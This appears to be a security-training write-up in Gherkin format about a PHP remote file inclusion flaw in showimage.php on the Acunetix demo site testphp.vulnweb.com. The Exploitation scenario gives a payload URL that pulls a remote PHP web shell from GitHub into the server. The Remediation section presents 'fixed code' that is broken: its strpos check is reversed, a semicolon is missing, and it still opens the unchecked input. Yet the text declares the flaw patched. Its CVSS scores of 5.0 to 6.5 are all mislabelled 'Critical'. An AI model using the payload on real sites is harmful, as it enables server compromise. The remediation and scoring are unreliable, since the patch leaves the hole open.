## Version 1.4.1
## language: en

Feature:
  TOE:
    acuart
  Category:
    PHP Remote File Inclusion.
  Location:
    http://testphp.vulnweb.com/showimage.php
  CWE:
    CWE-098: PHP Remote File Inclusion.
  Rule:
    REQ.050: https://fluidattacks.com/web/rules/050/
    REQ.158: https://fluidattacks.com/web/rules/158/
    REQ.241: https://fluidattacks.com/web/rules/241/
  Goal:
    Get remote resources to be included using remote file inclusion
  Recommendation:
    Variables should be sanitized and must work within their scope.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ubuntu          | 18.04.2     |
    | firefox         | 67.0(x64)   |
    | dirbuster       | 0.9.12      |
    | w3m             | 0.5.3       |
  TOE information:
    Given I have access to the url http://testphp.vulnweb.com/showimage.php
    And the server is running nginx version 1.4.1
    And PHP version 5.3.10

  Scenario: Normal use case
    When I open http://testphp.vulnweb.com/showimage.php?file=pictures/2.jpg
    Then I can see an image from the server.

  Scenario: Static detection
    When I do not have access to the source code.
    Then I am not able to do static detection.

  Scenario: Dynamic detection
    When I use dirbuster to detect unprotected folders and links.
    And I get these results of the url with parameters.
    """
    showimage.php?file=pictures/2.jpg
    """
    And I change them for a remote file.
    """
    showimage.php?file=testphp.vulnweb.com/showimage.php?file=
    https://s3.amazonaws.com/ceblog/wp-content/uploads/2016/04/
    22110359/youve-been-hacked.png
    """
    Then I get the remote image file[evidence](remoteimgicln.png)
    And I can conclude that the site is allowing remote file inclusion.

  Scenario: Exploitation
    When I open the url with these params:
    """
    showimage.php?file=
    https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
    """
    Then I include a remote file in the server file[evidence](rfi-phpcode.png)
    Then I am able to see in the source code of the remote file
    And I conclude that the site is allowing remote file inclusion
    When I try to run a command using the remote file Inclusion
    Then I am not able to run any command
    Then I conclude that the server allows remote file inclusion
    But the server does not execute the remote script

  Scenario: Remediation
    When file showimage.php checks for the file existance
    And the script forces to read only from an specific folder in the server
    """
    vulnerable code:

    $name = $_GET["file"];
    $fp = fopen($name, 'rb');
    file[evidence](vulnerable-code.png)

    Fixed code:
    $photo_folder = '/path/to/folder'
    if(strpos( $photo_folder , strip_tags($name) ) !== false){
      $fp = fopen($name, 'rb');
    }else{
      header("HTTP/1.0 404 Not Found");
    }
    """
    Then the script is no longer vulnerable to this attack.
    Then If I re-open the URL:
    """
    http://testphp.vulnweb.com/showimage.php?file=
    https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
    """
    Then I should not be able to include remote files.
    Then I can conclude that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (Critical) - CVSS:3.0AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.2/10 (Critical) - E:F/RL:W/RC:C/CR:X/IR:X/AR:X/MAV:X/MAC:L/MPR:N/MUI:N
  Environmental: Unique and relevant attributes to a specific user environment
    5.0/10 (Critical) - MAV:N

  Scenario: Correlations
    vbd/acuart/0098-php-local-file-inclusion
      Given I have acess to local files
      And the script can work with remote files
      When try to get a remote file
      Then I get the remote file
      And I am able to identify that this script is vulnerable
